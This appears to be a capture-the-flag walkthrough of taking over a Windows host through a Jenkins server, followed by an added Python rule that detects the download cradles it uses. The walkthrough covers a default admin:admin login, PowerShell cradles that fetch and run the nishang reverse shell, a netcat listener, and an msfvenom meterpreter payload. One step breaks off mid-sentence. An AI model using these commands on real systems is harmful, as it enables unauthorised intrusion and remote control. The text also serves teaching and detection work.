So first we scan the machine and see three ports open, namely 80, 8080 and 3389. By just visiting the pages we find out that port 80 is the main website and its CI/CD is being handled by Jenkins, which is on port 8080; if we browse over there we get a login page.
We can first try password spraying the admin user on this page with some default credentials, and if that doesn't work we can try to brute force, but luckily for us my first guess, admin:admin, worked. Now that we are logged in we see the dashboard, which has a project in it that is most probably the site running on port 80. To locate a place where we can execute commands, let's go to the project shown on the dashboard and look through the options there for something useful. After looking around for a while I found that we can go to Configure, scroll down to the Build section and put in the commands to execute on the machine and get a reverse shell. In here they recommend using the reverse shell from the nishang repo; the link to it is here →
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
The repo also has a lot of other cool tools → https://github.com/samratashok/nishang
So now, to get this reverse shell script onto the machine and execute it, we first download the Invoke-PowerShellTcp.ps1 script to our local machine and then host it with (on Python 3 the equivalent is python3 -m http.server 80)
python -m SimpleHTTPServer 80
and then we can fetch it with the command they provided, shown here; it downloads the file from our local server and then also invokes it for us (replace your-ip and your-port with your own listener address)
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Now let's click Apply at the bottom left of the screen and then start listening for the reverse shell. We do that with netcat, so the syntax would be
nc -nvlp <port defined in the above script>
and then in the Jenkins menu we click Build Now and we get a reverse shell on our nc listener that we can use. Now you can cat out the users and everything.
Now, to get a Metasploit shell, all we have to do is use exploit/multi/handler to listen instead of nc and send a payload that gives us a meterpreter shell.
To do that we first generate the payload like this →
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
and then we download this shell onto the target machine from the netcat shell (it is served from our local web server, here on port 8000):
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
and now in the handler we set payload windows/meterpreter/reverse_tcp and also set LHOST and LPORT.
Then we run the exploit so Metasploit listens for the shell, and to execute the shell from the nc listener we use powershell and run the command
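From the defender's side, both build-step commands used above (the Invoke-PowerShellTcp cradle and the later DownloadFile cradle) are noisy in process-creation telemetry: the Jenkins service's java.exe spawning powershell.exe with a WebClient download in its command line. This added example (not part of the original write-up) is a small Python detector run over constructed sample events; the paths and IPs in the sample data are made up.

```python
import re

# Constructed sample process-creation events (parent image, child image, command
# line) in the shape a Sysmon event 1 or Windows 4688 record gives after field
# extraction. The first two mirror the Jenkins build-step commands in this write-up.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell iex (New-Object Net.WebClient).DownloadString("
            "'http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1');"
            "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444"},
    {"parent": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell \"(New-Object System.Net.WebClient).Downloadfile("
            "'http://10.0.0.5:8000/shell-name.exe','shell-name.exe')\""},
    {"parent": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c msbuild site.sln /t:Build"},         # benign build step
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-ChildItem C:\\Users"},         # benign interactive use
]

# Download-cradle indicators; case-insensitive because PowerShell is.
CRADLE_PATTERNS = {
    "webclient":    re.compile(r"Net\.WebClient", re.I),
    "download":     re.compile(r"Download(?:String|File|Data)\s*\(", re.I),
    "iex":          re.compile(r"(?:^|[\s;\"'(])(?:iex|Invoke-Expression)\b", re.I),
    "reverse_args": re.compile(r"-Reverse\b.*-IPAddress\b", re.I),
}

def classify(event):
    """Return the reasons an event looks like a CI-spawned download cradle (empty if clean).

    Alert only when the Jenkins java.exe parent AND at least one cradle indicator
    coincide, so ordinary build steps and interactive PowerShell stay quiet.
    """
    parent_ok = event["parent"].lower().endswith("java.exe") and \
        event["image"].lower().endswith(("powershell.exe", "pwsh.exe", "cmd.exe"))
    hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(event["cmd"])]
    if parent_ok and hits:
        return ["shell spawned by Jenkins java.exe"] + [f"cradle indicator: {h}" for h in hits]
    return []

def scan(events):
    """Map event index -> reasons for every event that trips the rule."""
    return {i: r for i, ev in enumerate(events) if (r := classify(ev))}

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

Only the two Jenkins-spawned cradles (events 0 and 1) are flagged; the parent-process condition keeps the rule tight enough to run against a busy CI host.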